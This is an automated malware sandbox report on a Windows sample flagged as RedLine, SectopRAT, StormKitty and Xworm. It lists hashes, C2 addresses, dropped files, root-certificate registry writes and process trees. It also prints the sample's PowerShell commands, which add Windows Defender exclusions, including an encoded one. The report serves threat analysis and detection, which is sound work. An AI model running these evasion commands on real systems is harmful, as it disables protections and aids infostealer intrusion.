redline | 80923a0d7111b0a1fa4326e3a9a0d9ecb7ce66e276f8672aa79e2b5d99473fab

Analysis

max time kernel
118s
max time network
144s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
25-06-2024 16:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

EBC4B354D6EC654829F9DE447D0C7B04.exe
Size

839KB
MD5

ebc4b354d6ec654829f9de447d0c7b04
SHA1

9e5d3ccae0d22bd27f8ae39b2f35b274dabd7fd1
SHA256

80923a0d7111b0a1fa4326e3a9a0d9ecb7ce66e276f8672aa79e2b5d99473fab
SHA512

1cb3487cf2f1864d22d3148b30ecf70794567af3a84c9ba5f2d16b5dac38017347c4efb92e4978ebfe57588c5883a2ebe4af33e83eaafad99de202548fd0048e
SSDEEP

24576:3CIQgVHOEqG7111cZRHVzutBSRhmG5ep:yAH1KL1zwBSRhmAI

Score

10^/10

redline sectoprat stormkitty xworm x3.0 foundry execution infostealer rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

Version

5.0

79.110.49.209:7000

Mutex

biVc5L0dNUTxuebk

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

redline

Botnet

X3.0 Foundry

79.110.49.209:37552

Signatures

Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource yara_rule

behavioral1/memory/2568-117-0x00000000022E0000-0x00000000022EE000-memory.dmp disable_win_def
Detect Xworm Payload 2 IoCs

Processes:

resource yara_rule

\Users\Admin\AppData\Roaming\X3 Foundry.exe family_xworm
behavioral1/memory/2568-24-0x0000000000990000-0x00000000009A0000-memory.dmp family_xworm
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
RedLine payload 2 IoCs

Processes:

resource yara_rule

\Users\Admin\AppData\Roaming\X3.exe family_redline
behavioral1/memory/2672-22-0x0000000000860000-0x000000000087E000-memory.dmp family_redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat
SectopRAT payload 2 IoCs

Processes:

resource yara_rule

\Users\Admin\AppData\Roaming\X3.exe family_sectoprat
behavioral1/memory/2672-22-0x0000000000860000-0x000000000087E000-memory.dmp family_sectoprat
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty
StormKitty payload 1 IoCs

Processes:

resource yara_rule

behavioral1/memory/2568-116-0x000000001D6A0000-0x000000001D7C0000-memory.dmp family_stormkitty
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2960 powershell.exe
1208 powershell.exe
300 powershell.exe
Executes dropped EXE 3 IoCs

Processes:

X3 Libraries.exeX3 Foundry.exeX3.exe

pid process

3044 X3 Libraries.exe
2568 X3 Foundry.exe
2672 X3.exe
Loads dropped DLL 3 IoCs

Processes:

EBC4B354D6EC654829F9DE447D0C7B04.exe

pid process

2004 EBC4B354D6EC654829F9DE447D0C7B04.exe
2004 EBC4B354D6EC654829F9DE447D0C7B04.exe
2004 EBC4B354D6EC654829F9DE447D0C7B04.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

6 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

resource	yara_rule
behavioral1/memory/2568-117-0x00000000022E0000-0x00000000022EE000-memory.dmp	disable_win_def

resource	yara_rule
\Users\Admin\AppData\Roaming\X3 Foundry.exe	family_xworm
behavioral1/memory/2568-24-0x0000000000990000-0x00000000009A0000-memory.dmp	family_xworm

resource	yara_rule
\Users\Admin\AppData\Roaming\X3.exe	family_redline
behavioral1/memory/2672-22-0x0000000000860000-0x000000000087E000-memory.dmp	family_redline

resource	yara_rule
\Users\Admin\AppData\Roaming\X3.exe	family_sectoprat
behavioral1/memory/2672-22-0x0000000000860000-0x000000000087E000-memory.dmp	family_sectoprat

resource	yara_rule
behavioral1/memory/2568-116-0x000000001D6A0000-0x000000001D7C0000-memory.dmp	family_stormkitty

pid	process
2960	powershell.exe
1208	powershell.exe
300	powershell.exe

pid	process
3044	X3 Libraries.exe
2568	X3 Foundry.exe
2672	X3.exe

pid	process
2004	EBC4B354D6EC654829F9DE447D0C7B04.exe
2004	EBC4B354D6EC654829F9DE447D0C7B04.exe
2004	EBC4B354D6EC654829F9DE447D0C7B04.exe

flow	ioc
6	ip-api.com

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

X3.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	X3.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	X3.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	X3.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	X3.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	X3.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	X3.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

X3 Foundry.exe

pid process

2568 X3 Foundry.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2960 powershell.exe
1208 powershell.exe
300 powershell.exe

pid	process
2568	X3 Foundry.exe

pid	process
2960	powershell.exe
1208	powershell.exe
300	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exeX3.exeX3 Foundry.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeDebugPrivilege	2672	X3.exe
Token: SeDebugPrivilege	2568	X3 Foundry.exe
Token: SeDebugPrivilege	1208	powershell.exe
Token: SeDebugPrivilege	300	powershell.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

EBC4B354D6EC654829F9DE447D0C7B04.exeX3 Foundry.exe

description	pid	process	target process
PID 2004 wrote to memory of 2960	2004	EBC4B354D6EC654829F9DE447D0C7B04.exe	powershell.exe
PID 2004 wrote to memory of 2960	2004	EBC4B354D6EC654829F9DE447D0C7B04.exe	powershell.exe
PID 2004 wrote to memory of 2960	2004	EBC4B354D6EC654829F9DE447D0C7B04.exe	powershell.exe
PID 2004 wrote to memory of 2960	2004	EBC4B354D6EC654829F9DE447D0C7B04.exe	powershell.exe
PID 2004 wrote to memory of 3044	2004	EBC4B354D6EC654829F9DE447D0C7B04.exe	X3 Libraries.exe
PID 2004 wrote to memory of 3044	2004	EBC4B354D6EC654829F9DE447D0C7B04.exe	X3 Libraries.exe
PID 2004 wrote to memory of 3044	2004	EBC4B354D6EC654829F9DE447D0C7B04.exe	X3 Libraries.exe
PID 2004 wrote to memory of 3044	2004	EBC4B354D6EC654829F9DE447D0C7B04.exe	X3 Libraries.exe
PID 2004 wrote to memory of 2568	2004	EBC4B354D6EC654829F9DE447D0C7B04.exe	X3 Foundry.exe
PID 2004 wrote to memory of 2568	2004	EBC4B354D6EC654829F9DE447D0C7B04.exe	X3 Foundry.exe
PID 2004 wrote to memory of 2568	2004	EBC4B354D6EC654829F9DE447D0C7B04.exe	X3 Foundry.exe
PID 2004 wrote to memory of 2568	2004	EBC4B354D6EC654829F9DE447D0C7B04.exe	X3 Foundry.exe
PID 2004 wrote to memory of 2672	2004	EBC4B354D6EC654829F9DE447D0C7B04.exe	X3.exe
PID 2004 wrote to memory of 2672	2004	EBC4B354D6EC654829F9DE447D0C7B04.exe	X3.exe
PID 2004 wrote to memory of 2672	2004	EBC4B354D6EC654829F9DE447D0C7B04.exe	X3.exe
PID 2004 wrote to memory of 2672	2004	EBC4B354D6EC654829F9DE447D0C7B04.exe	X3.exe
PID 2568 wrote to memory of 1208	2568	X3 Foundry.exe	powershell.exe
PID 2568 wrote to memory of 1208	2568	X3 Foundry.exe	powershell.exe
PID 2568 wrote to memory of 1208	2568	X3 Foundry.exe	powershell.exe
PID 2568 wrote to memory of 300	2568	X3 Foundry.exe	powershell.exe
PID 2568 wrote to memory of 300	2568	X3 Foundry.exe	powershell.exe
PID 2568 wrote to memory of 300	2568	X3 Foundry.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\EBC4B354D6EC654829F9DE447D0C7B04.exe
"C:\Users\Admin\AppData\Local\Temp\EBC4B354D6EC654829F9DE447D0C7B04.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2004

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZgB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAYgB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAYgB6ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAcwBsACMAPgA="
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2960

C:\Users\Admin\AppData\Roaming\X3 Libraries.exe
"C:\Users\Admin\AppData\Roaming\X3 Libraries.exe"
2⤵
- Executes dropped EXE
PID:3044

C:\Users\Admin\AppData\Roaming\X3 Foundry.exe
"C:\Users\Admin\AppData\Roaming\X3 Foundry.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\X3 Foundry.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'X3 Foundry.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:300

C:\Users\Admin\AppData\Roaming\X3.exe
"C:\Users\Admin\AppData\Roaming\X3.exe"
2⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2672

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
342B

MD5
9aa4c9ed619337251a2cbd5e5d131d4f

SHA1
e1942140ee272665526d0b49daac7d270f45269b

SHA256
e7d5a4cf1320a412a9f48708cb6ac6702086a7d2a739e030c003ad60f2a4dbb5

SHA512
70982b79882a16d69294de1659e4b3c8a38d7cfff22cb1fdce0597be1e85c163565999ff2de7ad6cd0b502b0a76c6b8234bc7bd9fe0b4aa68cfd50ed910cb12a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab2B66.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar2C38.tmp
Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MI5E3R4XGFXS2C6VR48G.temp
Filesize
7KB

MD5
77dedfd4093821441e622db4a71826c2

SHA1
a2df66dfa0a27136c5cd4ba69bb3a4ad223084cd

SHA256
5028e0adb07011205e09876edb4d3c08db31bf3081d7dfaebd544f354e6830af

SHA512
3304c044fd284ef66067fac5d9b64c64d4aa6aa0891a919162d75d115292f629952cad390237add34913cb9866eadeffc8e5186ea9f93c108e73dfda790a67dd

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Roaming\X3 Foundry.exe
Filesize
37KB

MD5
481dfe8fc19890a677c7824c60f721e8

SHA1
5db87becad1d847643fc853206feb3b33236dcd1

SHA256
3fb3f5a0edfedb7b6d05fe45f499df151d0b4b474c86f886ddc497106b6aefe5

SHA512
edf8d07242f349bc96d9b583641556019c6b11478794a6243786b814fed99d3778df74ede6d5e745038880a64abfc1a5537cb9fc03f42e835319487aa4f11e74

Download Submit
\Users\Admin\AppData\Roaming\X3 Libraries.exe
Filesize
701KB

MD5
17a4fe963bfec0ddadd74c1f39e8fd8f

SHA1
a857e89e506074bfedc937dc62fb1aa9e63e3281

SHA256
364492be3bc6462856177bb67acfc98ab80b751e22fd07d441fbcdc89754534e

SHA512
5aba4065f5c44163b4b9f479135d2e4c358bdc8ec273ac7acab0b40743633d0711d19999c019ddf991d428bb337b7840c29bc5ed093439758456d0272b9b7c9d

Download Submit
\Users\Admin\AppData\Roaming\X3.exe
Filesize
95KB

MD5
7875166307500da488a1618d9790e14c

SHA1
94219d3929064c36a1a60dd0a0b82c67f1038f4a

SHA256
1a328c71452450974247cf6126bbde1b1ab459bb1c6f56cc6f4c5626b8c9d386

SHA512
2ffacea5b936fe99d17c46c3a24450a1b95d0cb84c355a7deec6080b8f4fb6ec442280ea953621a20bac379d0b7f11e9ff18a489a0eee0cb1bb3366ea3ba9d4f

Download Submit
memory/300-37-0x000000001B770000-0x000000001BA52000-memory.dmp

Filesize
2.9MB

Download
memory/300-38-0x0000000001E70000-0x0000000001E78000-memory.dmp

Filesize
32KB

Download
memory/1208-31-0x00000000027F0000-0x00000000027F8000-memory.dmp

Filesize
32KB

Download
memory/1208-30-0x000000001B550000-0x000000001B832000-memory.dmp

Filesize
2.9MB

Download
memory/2568-24-0x0000000000990000-0x00000000009A0000-memory.dmp

Filesize
64KB

Download
memory/2568-116-0x000000001D6A0000-0x000000001D7C0000-memory.dmp

Filesize
1.1MB

Download
memory/2568-117-0x00000000022E0000-0x00000000022EE000-memory.dmp

Filesize
56KB

Download
memory/2568-141-0x00000000022F0000-0x00000000022FE000-memory.dmp

Filesize
56KB

Download
memory/2568-142-0x000000001E6E0000-0x000000001EA30000-memory.dmp

Filesize
3.3MB

Download
memory/2672-22-0x0000000000860000-0x000000000087E000-memory.dmp

Filesize
120KB

Download
memory/3044-23-0x0000000000CC0000-0x0000000000D76000-memory.dmp

Filesize
728KB

Download